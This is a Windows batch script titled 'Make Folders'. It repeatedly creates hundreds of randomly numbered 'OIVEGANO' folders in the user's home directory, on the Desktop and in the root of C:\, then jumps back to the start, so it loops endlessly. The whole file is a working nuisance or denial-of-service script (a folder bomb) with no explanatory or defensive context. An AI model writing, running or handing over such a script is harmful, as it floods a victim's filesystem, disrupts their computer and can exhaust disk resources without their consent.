@echo off
title Make Folders
:folder1
cd C:\Users\%username%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
goto folder2

:folder2
cd C:\Users\%username%\Desktop
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
goto folder3

:folder3
cd C:\
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
mkdir OIVEGANO%random%
goto folder1